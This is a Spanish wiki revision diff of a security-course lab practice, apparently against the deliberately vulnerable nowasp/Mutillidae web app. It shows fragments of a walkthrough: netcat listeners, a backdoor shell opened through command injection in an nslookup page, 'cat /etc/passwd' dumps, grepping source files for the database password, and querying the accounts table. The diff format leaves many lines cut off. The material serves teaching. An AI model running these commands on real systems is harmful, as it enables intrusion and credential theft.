sad:fedora14:p3
Diferencias
Muestra las diferencias entre dos versiones de la página.
| Ambos lados, revisión anteriorRevisión previaPróxima revisión | Revisión previa | ||
| sad:fedora14:p3 [2018/02/08 18:02] – José Manuel Guallar | sad:fedora14:p3 [2019/01/04 13:18] (actual) – editor externo 127.0.0.1 | ||
|---|---|---|---|
| Línea 56: | Línea 56: | ||
| Esto permitirá que dos procesos se conecten a netcat. | Esto permitirá que dos procesos se conecten a netcat. | ||
| - | nc -l 4444, le dice a netcat que escuche y permita conexiones en el puerto 4444. | + | **nc -l 4444,** le dice a netcat que escuche y permita conexiones en el puerto 4444. |
| Línea 98: | Línea 98: | ||
| '' | '' | ||
| - | muestra informacion del sistema | + | muestra informacion del sistema |
| - | '' | + | |
| - | **cat /etc/passwd > passwd.txt**'' | + | '' |
| crea passwd.txt localizado en / | crea passwd.txt localizado en / | ||
| Línea 112: | Línea 112: | ||
| **volvemos al Firefox y abrimos otra pestaña y escribimos** | **volvemos al Firefox y abrimos otra pestaña y escribimos** | ||
| - | http:// | + | '' |
| {{: | {{: | ||
| Línea 133: | Línea 133: | ||
| {{: | {{: | ||
| - | '' | + | '' |
| - | Ejecutamos nc_connect.php | + | Ejecutamos |
| - | '' | + | '' |
| veremos que en la web pone conectando..... | veremos que en la web pone conectando..... | ||
| Línea 145: | Línea 145: | ||
| <code bash> | <code bash> | ||
| - | root@bt:~# nc 192.168.1.111 3333 | + | root@bt:~# nc 192.168.153.39 3333 |
| whoami | whoami | ||
| ps -eaf | egrep ' | ps -eaf | egrep ' | ||
| Línea 154: | Línea 154: | ||
| {{: | {{: | ||
| - | las dos primeras lineas es la ejecución del netcat via nslookup | + | Las dos primeras lineas es la ejecución del netcat via nslookup |
| las ultimas lineas el la puerta trasera | las ultimas lineas el la puerta trasera | ||
| Línea 164: | Línea 164: | ||
| '' | '' | ||
| - | luego vamos a contar los scripts | + | luego vamos a contar los scripts\\ |
| - | '' | + | |
| - | **find * -name " | + | |
| - | despues vamos a contar los archivos | + | '' |
| - | '' | + | |
| - | **find * -name " | + | despues vamos a contar los archivos |
| + | |||
| + | '' | ||
| + | |||
| + | lo siguiente sera buscar en cada archivo include (.inc) las palabras " | ||
| - | lo siguiente sera buscar en cada archivo include (.inc) las palabras " | ||
| {{: | {{: | ||
| + | |||
| <code bash> | <code bash> | ||
| find * -name " | find * -name " | ||
| Línea 191: | Línea 193: | ||
| find * -name " | find * -name " | ||
| </ | </ | ||
| + | |||
| {{: | {{: | ||
| ahora buscamos lo mismo pero solo mostramos las 8 primeras lineas de la cabecera, y observamos que el nombre del script que contiene la contraseña de la Base de datos es MySQLHandler.php | ahora buscamos lo mismo pero solo mostramos las 8 primeras lineas de la cabecera, y observamos que el nombre del script que contiene la contraseña de la Base de datos es MySQLHandler.php | ||
| Línea 207: | Línea 210: | ||
| echo "use nowasp; show tables;" | echo "use nowasp; show tables;" | ||
| </ | </ | ||
| + | |||
| {{: | {{: | ||
| - | vamos a investigar el contenido de la tabla accounts | + | Vamos a investigar el contenido de la tabla accounts |
| primer comando enseña los campos por columnas y por supuesto podemos ver el contenido de tablas | primer comando enseña los campos por columnas y por supuesto podemos ver el contenido de tablas | ||
| Línea 232: | Línea 236: | ||
| '' | '' | ||
| - | Tienes que realizar los siguientes pasos en el terminal de netcat | + | Tienes que realizar los siguientes pasos en el terminal de netcat |
| <code bash> | <code bash> | ||
sad/fedora14/p3.1518112968.txt.gz · Última modificación: (editor externo)
